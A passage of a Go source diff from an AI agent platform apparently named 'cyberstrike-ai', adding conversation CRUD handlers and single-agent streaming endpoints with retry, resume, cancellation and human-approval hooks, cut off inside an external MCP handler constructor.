`json:"projectId"` // 空字符串表示解除绑定 +} + +// CreateConversation 创建新对话 +func (h *ConversationHandler) CreateConversation(c *gin.Context) { + var req CreateConversationRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + title := req.Title + if title == "" { + title = "新对话" + } + + meta := audit.ConversationCreateMetaFromGin(c, "api") + meta.ProjectID = strings.TrimSpace(req.ProjectID) + conv, err := h.db.CreateConversation(title, meta) + if err != nil { + h.logger.Error("创建对话失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, conv) +} + +// SetConversationProject 设置或清除对话绑定的项目 +func (h *ConversationHandler) SetConversationProject(c *gin.Context) { + id := c.Param("id") + var req SetConversationProjectRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if _, err := h.db.GetConversation(id); err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"}) + return + } + if err := h.db.SetConversationProjectID(id, req.ProjectID); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + c.JSON(http.StatusOK, gin.H{"success": true, "projectId": strings.TrimSpace(req.ProjectID)}) +} + +// ListConversations 列出对话 +func (h *ConversationHandler) ListConversations(c *gin.Context) { + limitStr := c.DefaultQuery("limit", "50") + offsetStr := c.DefaultQuery("offset", "0") + search := c.Query("search") // 获取搜索参数 + + limit, _ := strconv.Atoi(limitStr) + offset, _ := strconv.Atoi(offsetStr) + + if limit <= 0 { + limit = 50 + } + if limit > 1000 { + limit = 1000 + } + + excludeGrouped := strings.TrimSpace(search) == "" && + (c.Query("exclude_grouped") == "true" || c.Query("exclude_grouped") == "1") + + var conversations []*database.Conversation + var total int + var err error + if excludeGrouped { + conversations, err = h.db.ListUngroupedConversations(limit, offset) + if err == nil { + total, err = h.db.CountUngroupedConversations() + } + } else { + conversations, err = h.db.ListConversations(limit, offset, search) + if err == nil { + total, err = h.db.CountConversations(search) + } + } + if err != nil { + h.logger.Error("获取对话列表失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if conversations == nil { + conversations = []*database.Conversation{} + } + c.JSON(http.StatusOK, gin.H{ + "conversations": conversations, + "total": total, + "limit": limit, + "offset": offset, + }) +} + +// GetConversation 获取对话 +func (h *ConversationHandler) GetConversation(c *gin.Context) { + id := c.Param("id") + + // 默认轻量加载,只有用户需要展开详情时再按需拉取 + // include_process_details=1/true 时返回全量 processDetails(兼容旧行为) + includeStr := c.DefaultQuery("include_process_details", "0") + include := includeStr == "1" || includeStr == "true" || includeStr == "yes" + + var ( + conv *database.Conversation + err error + ) + if include { + conv, err = h.db.GetConversation(id) + } else { + conv, err = h.db.GetConversationLite(id) + } + if err != nil { + h.logger.Error("获取对话失败", zap.Error(err)) + c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"}) + return + } + + c.JSON(http.StatusOK, conv) +} + +// GetMessageProcessDetails 获取指定消息的过程详情(按需加载) +func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) { + messageID := c.Param("id") + if messageID == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "message id required"}) + return + } + + details, err := h.db.GetProcessDetails(messageID) + if err != nil { + h.logger.Error("获取过程详情失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + details = database.DedupeConsecutiveProcessDetails(details) + + // 转换为前端期望的 JSON 结构(与 GetConversation 中 processDetails 结构一致) + out := make([]map[string]interface{}, 0, len(details)) + for _, d := range details { + var data interface{} + if d.Data != "" { + if err := json.Unmarshal([]byte(d.Data), &data); err != nil { + h.logger.Warn("解析过程详情数据失败", zap.Error(err)) + } + } + out = append(out, map[string]interface{}{ + "id": d.ID, + "messageId": d.MessageID, + "conversationId": d.ConversationID, + "eventType": d.EventType, + "message": d.Message, + "data": data, + "createdAt": d.CreatedAt, + }) + } + + c.JSON(http.StatusOK, gin.H{"processDetails": out}) +} + +// UpdateConversationRequest 更新对话请求 +type UpdateConversationRequest struct { + Title string `json:"title"` +} + +// UpdateConversation 更新对话 +func (h *ConversationHandler) UpdateConversation(c *gin.Context) { + id := c.Param("id") + + var req UpdateConversationRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if req.Title == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "标题不能为空"}) + return + } + + if err := h.db.UpdateConversationTitle(id, req.Title); err != nil { + h.logger.Error("更新对话失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 返回更新后的对话 + conv, err := h.db.GetConversation(id) + if err != nil { + h.logger.Error("获取更新后的对话失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + c.JSON(http.StatusOK, conv) +} + +// DeleteConversation 删除对话 +func (h *ConversationHandler) DeleteConversation(c *gin.Context) { + id := c.Param("id") + + if err := h.db.DeleteConversation(id); err != nil { + h.logger.Error("删除对话失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + if h.audit != nil { + h.audit.Record(c, audit.Entry{ + Category: "conversation", + Action: "delete", + Result: "success", + ResourceType: "conversation", + ResourceID: id, + Message: "删除对话", + }) + } + + c.JSON(http.StatusOK, gin.H{"message": "删除成功"}) +} + +// DeleteTurnRequest 删除一轮对话(POST /api/conversations/:id/delete-turn) +type DeleteTurnRequest struct { + MessageID string `json:"messageId"` +} + +// DeleteConversationTurn 删除锚点消息所在轮次(从该轮 user 到下一轮 user 之前),并清空 last_react_*。 +func (h *ConversationHandler) DeleteConversationTurn(c *gin.Context) { + conversationID := c.Param("id") + if conversationID == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "conversation id required"}) + return + } + + var req DeleteTurnRequest + if err := c.ShouldBindJSON(&req); err != nil || req.MessageID == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "messageId required"}) + return + } + + if _, err := h.db.GetConversation(conversationID); err != nil { + c.JSON(http.StatusNotFound, gin.H{"error": "对话不存在"}) + return + } + + deletedIDs, err := h.db.DeleteConversationTurn(conversationID, req.MessageID) + if err != nil { + h.logger.Warn("删除对话轮次失败", + zap.String("conversationId", conversationID), + zap.String("messageId", req.MessageID), + zap.Error(err), + ) + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if h.audit != nil { + h.audit.RecordOK(c, "conversation", "delete_turn", "删除对话轮次", "conversation", conversationID, map[string]interface{}{ + "message_id": req.MessageID, + "deleted": len(deletedIDs), + }) + } + c.JSON(http.StatusOK, gin.H{ + "deletedMessageIds": deletedIDs, + "message": "ok", + }) +} diff --git a/internal/handler/eino_resume_segment.go b/internal/handler/eino_resume_segment.go new file mode 100644 index 00000000..dbd26af9 --- /dev/null +++ b/internal/handler/eino_resume_segment.go @@ -0,0 +1,180 @@ +package handler + +import ( + "context" + "errors" + "fmt" + "strings" + "time" + + "cyberstrike-ai/internal/agent" + "cyberstrike-ai/internal/multiagent" + + "go.uber.org/zap" +) + +func (h *AgentHandler) einoRunRetryMaxAttempts() int { + if h.config != nil { + return multiagent.RunRetryMaxAttemptsFromConfig(&h.config.MultiAgent.EinoMiddleware) + } + return multiagent.RunRetryMaxAttemptsFromConfig(nil) +} + +func (h *AgentHandler) einoRunRetryMaxBackoffSec() int { + if h.config != nil && h.config.MultiAgent.EinoMiddleware.RunRetryMaxBackoffSec > 0 { + return h.config.MultiAgent.EinoMiddleware.RunRetryMaxBackoffSec + } + return 0 +} + +// applyEinoTraceResumeSegment 中断并继续:persist last_react_* → loadHistory,可选替换下一段 user 文案。 +func (h *AgentHandler) applyEinoTraceResumeSegment( + conversationID string, + result *multiagent.RunResult, + curHistory *[]agent.ChatMessage, + curFinalMessage *string, + segmentUserMessage string, +) { + if shouldPersistEinoAgentTraceAfterRunError(context.Background()) { + h.persistEinoAgentTraceForResume(conversationID, result) + } + if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 { + *curHistory = hist + } + if segmentUserMessage != "" { + *curFinalMessage = segmentUserMessage + } +} + +// applyEinoTransientRetrySegment 临时错误重试:恢复轨迹并保留本请求原始 user 文案(不注入续跑说明)。 +// segmentUserMessage 为本轮 HTTP 请求开始时用户发送的内容,避免因清空 finalMessage 而丢失「你好」等短句。 +func (h *AgentHandler) applyEinoTransientRetrySegment( + conversationID string, + result *multiagent.RunResult, + curHistory *[]agent.ChatMessage, + curFinalMessage *string, + segmentUserMessage string, +) { + if shouldPersistEinoAgentTraceAfterRunError(context.Background()) { + h.persistEinoAgentTraceForResume(conversationID, result) + } + if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 { + *curHistory = hist + } + if s := strings.TrimSpace(segmentUserMessage); s != "" { + *curFinalMessage = segmentUserMessage + } +} + +// handleEinoTransientRetryContinue 在 SSE 任务循环内处理临时错误重试;返回 true 表示外层 for 应 continue。 +func (h *AgentHandler) handleEinoTransientRetryContinue( + baseCtx context.Context, + conversationID string, + result *multiagent.RunResult, + runErr error, + transientAttempts *int, + curHistory *[]agent.ChatMessage, + curFinalMessage *string, + segmentUserMessage string, + progressCallback func(eventType, message string, data interface{}), + sendProgress func(msg string, extra map[string]interface{}), +) (handled bool, fatal error) { + if !errors.Is(runErr, multiagent.ErrTransientRetryContinue) { + return false, nil + } + maxAttempts := h.einoRunRetryMaxAttempts() + *transientAttempts++ + if *transientAttempts > maxAttempts { + if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { + h.persistEinoAgentTraceForResume(conversationID, result) + } + return false, errors.New("transient retry exhausted: " + runErr.Error()) + } + attemptNo := *transientAttempts + backoff := multiagent.TransientRetryBackoff(attemptNo-1, h.einoRunRetryMaxBackoffSec()) + if progressCallback != nil { + progressCallback("eino_run_retry", fmt.Sprintf("遇到临时错误,%d 秒后第 %d/%d 次重试…", int(backoff.Seconds()), attemptNo, maxAttempts), map[string]interface{}{ + "conversationId": conversationID, + "source": "eino", + "attempt": attemptNo, + "maxAttempts": maxAttempts, + "backoffSec": int(backoff.Seconds()), + }) + } + select { + case <-baseCtx.Done(): + return false, context.Cause(baseCtx) + case <-time.After(backoff): + } + h.applyEinoTransientRetrySegment(conversationID, result, curHistory, curFinalMessage, segmentUserMessage) + if progressCallback != nil { + progressCallback("eino_run_retry", "已恢复上下文,正在重试…", map[string]interface{}{ + "conversationId": conversationID, + "source": "eino", + "attempt": attemptNo, + }) + } + if sendProgress != nil { + sendProgress("正在重试…", map[string]interface{}{ + "conversationId": conversationID, + "source": "transient_retry", + }) + } + return true, nil +} + +// handleEinoEmptyResponseContinue 在 SSE 任务循环内处理「正常结束但无助手正文」;返回 exhausted=true 时由外层按成功结束(保留占位文案)。 +// 与临时错误重试一致:仅恢复轨迹并保留本请求原始 user 文案,不向模型注入续跑说明。 +func (h *AgentHandler) handleEinoEmptyResponseContinue( + baseCtx context.Context, + conversationID string, + result *multiagent.RunResult, + runErr error, + emptyResponseAttempts *int, + curHistory *[]agent.ChatMessage, + curFinalMessage *string, + segmentUserMessage string, + progressCallback func(eventType, message string, data interface{}), + sendProgress func(msg string, extra map[string]interface{}), +) (handled bool, exhausted bool) { + if !errors.Is(runErr, multiagent.ErrEmptyResponseContinue) { + return false, false + } + maxAttempts := h.einoRunRetryMaxAttempts() + *emptyResponseAttempts++ + if *emptyResponseAttempts > maxAttempts { + if h.logger != nil { + h.logger.Warn("eino empty response auto resume exhausted", + zap.String("conversationId", conversationID), + zap.Int("maxAttempts", maxAttempts)) + } + if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { + h.persistEinoAgentTraceForResume(conversationID, result) + } + return false, true + } + attemptNo := *emptyResponseAttempts + if h.logger != nil { + h.logger.Info("eino empty response, auto resume from trace", + zap.String("conversationId", conversationID), + zap.Int("attempt", attemptNo), + zap.Int("maxAttempts", maxAttempts)) + } + if progressCallback != nil { + progressCallback("eino_empty_response_continue", fmt.Sprintf("未捕获到助手正文,正在基于轨迹自动续跑(%d/%d)…", attemptNo, maxAttempts), map[string]interface{}{ + "conversationId": conversationID, + "source": "eino", + "attempt": attemptNo, + "maxAttempts": maxAttempts, + "resumeKind": "trace_segment", + }) + } + h.applyEinoTransientRetrySegment(conversationID, result, curHistory, curFinalMessage, segmentUserMessage) + if sendProgress != nil { + sendProgress("已恢复上下文,正在继续推理…", map[string]interface{}{ + "conversationId": conversationID, + "source": "empty_response_continue", + }) + } + return true, false +} diff --git a/internal/handler/eino_single_agent.go b/internal/handler/eino_single_agent.go new file mode 100644 index 00000000..0d1fb1f7 --- /dev/null +++ b/internal/handler/eino_single_agent.go @@ -0,0 +1,511 @@ +package handler + +import ( + "context" + "encoding/json" + "errors" + "fmt" + "net/http" + "strings" + "sync" + "time" + + "cyberstrike-ai/internal/mcp" + "cyberstrike-ai/internal/multiagent" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" +) + +// EinoSingleAgentLoopStream Eino ADK 单代理(ChatModelAgent + Runner)流式对话;不依赖 multi_agent.enabled。 +func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) { + c.Header("Content-Type", "text/event-stream; charset=utf-8") + c.Header("Cache-Control", "no-cache") + c.Header("Connection", "keep-alive") + + var req ChatRequest + if err := c.ShouldBindJSON(&req); err != nil { + ev := StreamEvent{Type: "error", Message: "请求参数错误: " + err.Error()} + b, _ := json.Marshal(ev) + fmt.Fprintf(c.Writer, "data: %s\n\n", b) + done := StreamEvent{Type: "done", Message: ""} + db, _ := json.Marshal(done) + fmt.Fprintf(c.Writer, "data: %s\n\n", db) + if flusher, ok := c.Writer.(http.Flusher); ok { + flusher.Flush() + } + return + } + + c.Header("X-Accel-Buffering", "no") + + var baseCtx context.Context + clientDisconnected := false + var sseWriteMu sync.Mutex + var ssePublishConversationID string + sendEvent := func(eventType, message string, data interface{}) { + if eventType == "error" && baseCtx != nil { + cause := context.Cause(baseCtx) + if errors.Is(cause, ErrTaskCancelled) || errors.Is(cause, multiagent.ErrInterruptContinue) { + return + } + } + ev := StreamEvent{Type: eventType, Message: message, Data: data} + b, errMarshal := json.Marshal(ev) + if errMarshal != nil { + b = []byte(`{"type":"error","message":"marshal failed"}`) + } + sseLine := make([]byte, 0, len(b)+8) + sseLine = append(sseLine, []byte("data: ")...) + sseLine = append(sseLine, b...) + sseLine = append(sseLine, '\n', '\n') + if ssePublishConversationID != "" && h.taskEventBus != nil { + h.taskEventBus.Publish(ssePublishConversationID, sseLine) + } + if clientDisconnected { + return + } + select { + case <-c.Request.Context().Done(): + clientDisconnected = true + return + default: + } + sseWriteMu.Lock() + _, err := c.Writer.Write(sseLine) + if err != nil { + sseWriteMu.Unlock() + clientDisconnected = true + return + } + if flusher, ok := c.Writer.(http.Flusher); ok { + flusher.Flush() + } else { + c.Writer.Flush() + } + sseWriteMu.Unlock() + } + + h.logger.Info("收到 Eino ADK 单代理流式请求", + zap.String("conversationId", req.ConversationID), + ) + + prep, err := h.prepareMultiAgentSession(&req, c, "eino_agent_stream") + if err != nil { + sendEvent("error", err.Error(), nil) + sendEvent("done", "", nil) + return + } + ssePublishConversationID = prep.ConversationID + if prep.CreatedNew { + sendEvent("conversation", "会话已创建", map[string]interface{}{ + "conversationId": prep.ConversationID, + }) + } + + conversationID := prep.ConversationID + assistantMessageID := prep.AssistantMessageID + h.activateHITLForConversation(conversationID, req.Hitl) + if h.hitlManager != nil { + defer h.hitlManager.DeactivateConversation(conversationID) + } + + if prep.UserMessageID != "" { + sendEvent("message_saved", "", map[string]interface{}{ + "conversationId": conversationID, + "userMessageId": prep.UserMessageID, + }) + } + + var cancelWithCause context.CancelCauseFunc + curFinalMessage := prep.FinalMessage + segmentUserMessage := prep.FinalMessage // 本请求原始用户句,临时重试时不得丢失 + curHistory := prep.History + roleTools := prep.RoleTools + + taskStatus := "completed" + // 仅在成功 StartTask 后再 FinishTask。若 StartTask 因 ErrTaskAlreadyRunning 失败仍 defer FinishTask, + // 会误删其他连接上正在运行的同会话任务,导致「第一次拦截、第二次却放行」。 + taskOwned := false + defer func() { + if taskOwned { + h.tasks.FinishTask(conversationID, taskStatus) + } + }() + + sendEvent("progress", "正在启动 Eino ADK 单代理(ChatModelAgent)...", map[string]interface{}{ + "conversationId": conversationID, + }) + + stopKeepalive := make(chan struct{}) + go sseKeepalive(c, stopKeepalive, &sseWriteMu) + defer close(stopKeepalive) + + if h.config == nil { + taskStatus = "failed" + h.tasks.UpdateTaskStatus(conversationID, taskStatus) + sendEvent("error", "服务器配置未加载", nil) + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) + return + } + + var result *multiagent.RunResult + var runErr error + + baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) + taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute) + + if _, err := h.tasks.StartTask(conversationID, req.Message, cancelWithCause); err != nil { + var errorMsg string + if errors.Is(err, ErrTaskAlreadyRunning) { + errorMsg = "⚠️ 当前会话已有任务正在执行中,请等待当前任务完成或点击「停止任务」后再尝试。" + sendEvent("error", errorMsg, map[string]interface{}{ + "conversationId": conversationID, + "errorType": "task_already_running", + }) + } else { + errorMsg = "❌ 无法启动任务: " + err.Error() + sendEvent("error", errorMsg, nil) + } + if assistantMessageID != "" { + _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errorMsg, time.Now(), assistantMessageID) + } + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) + timeoutCancel() + return + } + taskOwned = true + + var cumulativeMCPExecutionIDs []string + var transientRunAttempts int + var emptyResponseAttempts int + // 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。 + var mainIterationOffset int + + for { + segmentMainIterationMax := 0 + rawProgressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, sendEvent) + progressCallback := func(eventType, message string, data interface{}) { + if eventType == "iteration" { + if m, ok := data.(map[string]interface{}); ok { + if scope, _ := m["einoScope"].(string); scope == "main" { + raw := 0 + switch v := m["iteration"].(type) { + case int: + raw = v + case int32: + raw = int(v) + case int64: + raw = int(v) + case float64: + raw = int(v) + case float32: + raw = int(v) + } + if raw > 0 { + if raw > segmentMainIterationMax { + segmentMainIterationMax = raw + } + m["iteration"] = raw + mainIterationOffset + } + } + } + } + rawProgressCallback(eventType, message, data) + } + taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID) + taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks) + taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) { + return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments) + }) + + result, runErr = multiagent.RunEinoSingleChatModelAgent( + taskCtxLoop, + h.config, + &h.config.MultiAgent, + h.agent, + h.logger, + conversationID, + h.conversationProjectID(conversationID), + curFinalMessage, + curHistory, + roleTools, + progressCallback, + chatReasoningToClientIntent(req.Reasoning), + h.projectBlackboardBlock(conversationID), + ) + + if result != nil && len(result.MCPExecutionIDs) > 0 { + cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs) + } + + handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue( + baseCtx, conversationID, result, runErr, &emptyResponseAttempts, + &curHistory, &curFinalMessage, segmentUserMessage, progressCallback, + func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) }, + ) + if exhaustedEmpty { + runErr = nil + transientRunAttempts = 0 + timeoutCancel() + break + } + if handledEmpty { + mainIterationOffset += segmentMainIterationMax + transientRunAttempts = 0 + timeoutCancel() + baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) + h.tasks.BindTaskCancel(conversationID, cancelWithCause) + taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute) + h.tasks.UpdateTaskStatus(conversationID, "running") + continue + } + + if runErr == nil { + // 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。 + transientRunAttempts = 0 + emptyResponseAttempts = 0 + timeoutCancel() + break + } + + handled, fatalErr := h.handleEinoTransientRetryContinue( + baseCtx, conversationID, result, runErr, &transientRunAttempts, + &curHistory, &curFinalMessage, segmentUserMessage, progressCallback, + func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) }, + ) + if handled { + mainIterationOffset += segmentMainIterationMax + timeoutCancel() + baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) + h.tasks.BindTaskCancel(conversationID, cancelWithCause) + taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute) + h.tasks.UpdateTaskStatus(conversationID, "running") + continue + } + if fatalErr != nil { + runErr = fatalErr + } + + cause := context.Cause(baseCtx) + if errors.Is(cause, multiagent.ErrInterruptContinue) { + if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { + h.persistEinoAgentTraceForResume(conversationID, result) + } + note := h.tasks.TakeInterruptContinueNote(conversationID) + icSummary := interruptContinueTimelineSummary(note) + progressCallback("user_interrupt_continue", icSummary, map[string]interface{}{ + "conversationId": conversationID, + "rawReason": strings.TrimSpace(note), + "emptyReason": strings.TrimSpace(note) == "", + "kind": "no_active_mcp_tool", + }) + inject := formatInterruptContinueUserMessage(note) + // 不写入 messages 表为 user 气泡:避免主对话流出现大段模板;说明已由 user_interrupt_continue 记入助手 process_details(迭代详情)。 + if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 { + curHistory = hist + } + curFinalMessage = inject + sendEvent("progress", "已合并用户补充与最新轨迹,正在继续推理…", map[string]interface{}{ + "conversationId": conversationID, + "source": "interrupt_continue", + }) + mainIterationOffset += segmentMainIterationMax + // 非临时错误分段续跑(用户中断并继续)时,清空 transient 计数,避免跨分段累加。 + transientRunAttempts = 0 + timeoutCancel() + baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) + h.tasks.BindTaskCancel(conversationID, cancelWithCause) + taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute) + h.tasks.UpdateTaskStatus(conversationID, "running") + continue + } + + if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { + h.persistEinoAgentTraceForResume(conversationID, result) + } + if errors.Is(cause, ErrTaskCancelled) { + taskStatus = "cancelled" + h.tasks.UpdateTaskStatus(conversationID, taskStatus) + cancelMsg := "任务已被用户取消,后续操作已停止。" + if assistantMessageID != "" { + if result != nil { + if err := h.mergeAssistantMessagePartialOnCancel(assistantMessageID, result.Response); err != nil { + h.logger.Warn("合并取消前的部分回复失败", zap.Error(err)) + } + } + if err := h.appendAssistantMessageNotice(assistantMessageID, cancelMsg); err != nil { + h.logger.Warn("更新取消后的助手消息失败", zap.Error(err)) + } + _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "cancelled", cancelMsg, nil) + } + sendEvent("cancelled", cancelMsg, map[string]interface{}{ + "conversationId": conversationID, + "messageId": assistantMessageID, + }) + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) + timeoutCancel() + return + } + + if errors.Is(runErr, context.DeadlineExceeded) || errors.Is(context.Cause(taskCtx), context.DeadlineExceeded) { + taskStatus = "timeout" + h.tasks.UpdateTaskStatus(conversationID, taskStatus) + timeoutMsg := "任务执行超时,已自动终止。" + if assistantMessageID != "" { + _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", timeoutMsg, time.Now(), assistantMessageID) + _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "timeout", timeoutMsg, nil) + } + sendEvent("error", timeoutMsg, map[string]interface{}{ + "conversationId": conversationID, + "messageId": assistantMessageID, + "errorType": "timeout", + }) + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) + timeoutCancel() + return + } + + h.logger.Error("Eino ADK 单代理执行失败", zap.Error(runErr)) + taskStatus = "failed" + h.tasks.UpdateTaskStatus(conversationID, taskStatus) + errMsg := "执行失败: " + runErr.Error() + if assistantMessageID != "" { + _, _ = h.db.Exec("UPDATE messages SET content = ?, updated_at = ? WHERE id = ?", errMsg, time.Now(), assistantMessageID) + _ = h.db.AddProcessDetail(assistantMessageID, conversationID, "error", errMsg, nil) + } + sendEvent("error", errMsg, map[string]interface{}{ + "conversationId": conversationID, + "messageId": assistantMessageID, + }) + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) + timeoutCancel() + return + } + + timeoutCancel() + + if assistantMessageID != "" { + _ = h.db.UpdateAssistantMessageFinalize(assistantMessageID, result.Response, cumulativeMCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput)) + } + + if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" { + if err := h.db.SaveAgentTrace(conversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput); err != nil { + h.logger.Warn("保存代理轨迹失败", zap.Error(err)) + } + } + + sendEvent("response", result.Response, map[string]interface{}{ + "mcpExecutionIds": cumulativeMCPExecutionIDs, + "conversationId": conversationID, + "messageId": assistantMessageID, + "agentMode": "eino_single", + }) + sendEvent("done", "", map[string]interface{}{"conversationId": conversationID}) +} + +// EinoSingleAgentLoop Eino ADK 单代理非流式对话。 +func (h *AgentHandler) EinoSingleAgentLoop(c *gin.Context) { + var req ChatRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + h.logger.Info("收到 Eino ADK 单代理非流式请求", zap.String("conversationId", req.ConversationID)) + + prep, err := h.prepareMultiAgentSession(&req, c, "eino_agent") + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + h.activateHITLForConversation(prep.ConversationID, req.Hitl) + if h.hitlManager != nil { + defer h.hitlManager.DeactivateConversation(prep.ConversationID) + } + + var progressBuf strings.Builder + progressCallbackRaw := func(eventType, message string, data interface{}) { + progressBuf.WriteString(eventType) + progressBuf.WriteByte('\n') + } + baseCtx, cancelWithCause := context.WithCancelCause(c.Request.Context()) + defer cancelWithCause(nil) + taskCtx, timeoutCancel := context.WithTimeout(baseCtx, 600*time.Minute) + defer timeoutCancel() + progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, progressCallbackRaw) + taskCtx = multiagent.WithHITLToolInterceptor(taskCtx, func(ctx context.Context, toolName, arguments string) (string, error) { + return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments) + }) + + if h.config == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "服务器配置未加载"}) + return + } + + curHist := prep.History + curMsg := prep.FinalMessage + var result *multiagent.RunResult + var runErr error + var transientRunAttempts int + var emptyResponseAttempts int + for { + result, runErr = multiagent.RunEinoSingleChatModelAgent( + taskCtx, + h.config, + &h.config.MultiAgent, + h.agent, + h.logger, + prep.ConversationID, + h.conversationProjectID(prep.ConversationID), + curMsg, + curHist, + prep.RoleTools, + progressCallback, + chatReasoningToClientIntent(req.Reasoning), + h.projectBlackboardBlock(prep.ConversationID), + ) + handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue( + baseCtx, prep.ConversationID, result, runErr, &emptyResponseAttempts, + &curHist, &curMsg, prep.FinalMessage, progressCallback, nil, + ) + if exhaustedEmpty { + runErr = nil + break + } + if handledEmpty { + continue + } + if runErr == nil { + break + } + if handled, fatalErr := h.handleEinoTransientRetryContinue( + baseCtx, prep.ConversationID, result, runErr, &transientRunAttempts, + &curHist, &curMsg, prep.FinalMessage, progressCallback, nil, + ); handled { + continue + } else if fatalErr != nil { + runErr = fatalErr + } + if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { + h.persistEinoAgentTraceForResume(prep.ConversationID, result) + } + c.JSON(http.StatusInternalServerError, gin.H{"error": runErr.Error()}) + return + } + + if prep.AssistantMessageID != "" { + _ = h.db.UpdateAssistantMessageFinalize(prep.AssistantMessageID, result.Response, result.MCPExecutionIDs, multiagent.AggregatedReasoningFromTraceJSON(result.LastAgentTraceInput)) + } + if result.LastAgentTraceInput != "" || result.LastAgentTraceOutput != "" { + _ = h.db.SaveAgentTrace(prep.ConversationID, result.LastAgentTraceInput, result.LastAgentTraceOutput) + } + + c.JSON(http.StatusOK, gin.H{ + "response": result.Response, + "conversationId": prep.ConversationID, + "mcpExecutionIds": result.MCPExecutionIDs, + "assistantMessageId": prep.AssistantMessageID, + "agentMode": "eino_single", + }) +} diff --git a/internal/handler/external_mcp.go b/internal/handler/external_mcp.go new file mode 100644 index 00000000..931c9e09 --- /dev/null +++ b/internal/handler/external_mcp.go @@ -0,0 +1,485 @@ +package handler + +import ( + "fmt" + "net/http" + "os" + "sync" + + "cyberstrike-ai/internal/audit" + "cyberstrike-ai/internal/config" + "cyberstrike-ai/internal/mcp" + + "github.com/gin-gonic/gin" + "go.uber.org/zap" + "gopkg.in/yaml.v3" +) + +// ExternalMCPHandler 外部MCP处理器 +type ExternalMCPHandler struct { + manager *mcp.ExternalMCPManager + config *config.Config + configPath string + logger *zap.Logger + audit *audit.Service + mu sync.RWMutex +} + +// SetAudit wires platform audit logging. +func (h *ExternalMCPHandler) SetAudit(s *audit.Service) { + h.audit = s +} + +// NewExternalMCPHandler 创建外部MCP处理器 +func NewExternalMCPHandler(manager *mcp.ExternalMCPManager, cfg *config.Config, configPath string, logger *zap.Logger) *ExternalMCPHandler { + return &ExternalMCPHandler{ + manager: manager, + config: cfg, + 